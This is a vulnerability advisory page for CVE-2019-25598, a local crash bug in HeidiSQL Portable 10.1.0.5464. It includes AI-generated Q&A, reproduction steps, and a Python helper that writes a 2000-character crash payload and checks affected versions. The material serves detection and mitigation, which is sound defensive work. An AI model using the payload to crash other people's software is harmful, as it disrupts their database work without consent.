CVE-2019-25598
Buffer Overflow in HeidiSQL 10.1.0 Causes Local DoS
Publication date: 2026-03-22
Last updated on: 2026-03-22
Assigner: VulnCheck
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| heidisql | heidisql_portable | 10.1.0.5464 |
| heidisql | heidisql_portable | up to and including 10.1.0.5464 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-787 | The product writes data past the end, or before the beginning, of the intended buffer. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2019-25598 is a denial-of-service vulnerability in HeidiSQL Portable version 10.1.0.5464. It is triggered when a local attacker enters an excessively long string (the published procedure uses 2000 characters) into the password field while logging in to a Microsoft SQL Server connection. The oversized input causes an out-of-bounds write and the application crashes.
The weakness is classified as CWE-787 (Out-of-bounds Write). The attack vector is local, no privileges or user interaction are required, and the impact is a high loss of availability because the client process terminates. No code execution or data exposure is described for this issue.
How can this vulnerability impact me?
This vulnerability can cause HeidiSQL Portable to crash when an attacker supplies an excessively long password string during login. This results in a denial of service condition, making the application unavailable for legitimate users.
- Loss of availability of the HeidiSQL application.
- Potential disruption of database management tasks relying on HeidiSQL.
- No direct impact on confidentiality or integrity, but service interruption could affect operations.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by reproducing the denial-of-service condition with the published method: supply an excessively long string in the password field during a Microsoft SQL Server login in HeidiSQL Portable 10.1.0.5464. Because the overflow happens inside the desktop client and the attack vector is local, there is no network traffic to alert on; in practice, detection means inventorying hosts for HeidiSQL Portable builds at or below 10.1.0.5464, and confirming on a test machine (not a production workstation, since a positive result is a crash) with the following steps.
- Run the provided Python script `HeidiSQL_Portable_10.1.0.5464.py` to generate a payload file containing 2000 'A' characters.
- Copy the contents of the generated file `bd_p.txt` to the clipboard.
- Launch HeidiSQL Portable and create a new connection with the network type set to 'Microsoft SQL Server (TCP/IP)'.
- Enable 'Prompt for credentials' and open the connection.
- In the login dialog, set the authentication method to 'Password' and paste the clipboard content (the long string) into the password field.
- Click 'Login'. If the application crashes, the vulnerability is present. [2]
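The following Python is an added example for this page; it is neither the `HeidiSQL_Portable_10.1.0.5464.py` script referenced above nor HeidiSQL project code. It reconstructs the two pieces a practitioner needs for triage: a payload builder that produces the 2000-'A' string the procedure pastes into the password field (written to `bd_p.txt`, the file name the page uses), and a version check that flags any HeidiSQL build at or below 10.1.0.5464, the affected range stated on this page. The function names, the constructed sample version strings, the assumption that the portable executable is `heidisql.exe`, and the PowerShell `VersionInfo.FileVersion` lookup suggested in the comments are mine, not the page's. The GUI steps (creating the connection, pasting, clicking Login) still have to be performed by hand.

```python
"""Triage helpers for CVE-2019-25598 (added example, not the page's PoC script).

- is_affected() tells whether a HeidiSQL version string is 10.1.0.5464 or
  earlier, the affected range stated on the page.
- build_payload()/write_payload() reproduce the 2000-'A' input the published
  procedure pastes into the Microsoft SQL Server password field.
"""
from __future__ import annotations

import re
from pathlib import Path

# Last affected build stated on the page ("up to and including 10.1.0.5464").
LAST_AFFECTED = (10, 1, 0, 5464)
PAYLOAD_FILE = "bd_p.txt"      # file name used in the page's reproduction steps
PAYLOAD_LENGTH = 2000          # character count used in the page's reproduction steps

_VERSION_RE = re.compile(r"^\d+(?:\.\d+){0,3}$")


def parse_version(text: str) -> tuple[int, ...]:
    """Turn 'major.minor.release.build' into a comparable 4-tuple of ints.

    Missing trailing components are treated as 0, so '10.1' == '10.1.0.0'.
    Surrounding whitespace and a leading 'v' are tolerated because strings
    copied from About dialogs or file properties often carry them.
    """
    cleaned = text.strip().lstrip("vV")
    if not _VERSION_RE.match(cleaned):
        raise ValueError(f"unrecognised version string: {text!r}")
    parts = [int(p) for p in cleaned.split(".")]
    parts += [0] * (4 - len(parts))
    return tuple(parts)


def is_affected(version: str) -> bool:
    """True when the build is 10.1.0.5464 or earlier (the page's affected range)."""
    return parse_version(version) <= LAST_AFFECTED


def build_payload(length: int = PAYLOAD_LENGTH, filler: str = "A") -> str:
    """Return the long string the procedure pastes into the password field."""
    if length <= 0 or len(filler) != 1:
        raise ValueError("length must be positive and filler a single character")
    return filler * length


def write_payload(path: str | Path = PAYLOAD_FILE, length: int = PAYLOAD_LENGTH) -> Path:
    """Write the payload to a file (default bd_p.txt, as in the page's steps).

    Written as raw ASCII with no trailing newline: a newline would otherwise be
    pasted into the password field along with the filler characters.
    """
    target = Path(path)
    target.write_bytes(build_payload(length).encode("ascii"))
    return target


if __name__ == "__main__":
    # Constructed sample version strings. On a real host the value would come
    # from the binary, e.g. (assumption: the portable binary is heidisql.exe)
    #   (Get-Item .\heidisql.exe).VersionInfo.FileVersion
    for v in ("10.1.0.5464", "10.1.0.5001", "9.5.0.5196", "10.2.0.5599", "11.0.0.5919"):
        print(f"{v:>12}: {'AFFECTED' if is_affected(v) else 'not in affected range'}")
    out = write_payload()
    print(f"wrote {out} ({out.stat().st_size} bytes)")
```

Run it once per host whose HeidiSQL version you have collected; an `AFFECTED` verdict means the reproduction steps above apply. The payload file is deliberately written without a trailing newline so that the 2000 characters, and nothing else, land in the password field when pasted.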
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include avoiding the use of HeidiSQL Portable version 10.1.0.5464 or earlier until a patched version is available.
Do not allow untrusted local users to access the system or run HeidiSQL Portable, as the vulnerability requires local access.
Monitor for updates or patches from the HeidiSQL developers and apply them as soon as they are released.
As a temporary workaround, avoid pasting or entering excessively long strings in the password field during Microsoft SQL Server login attempts.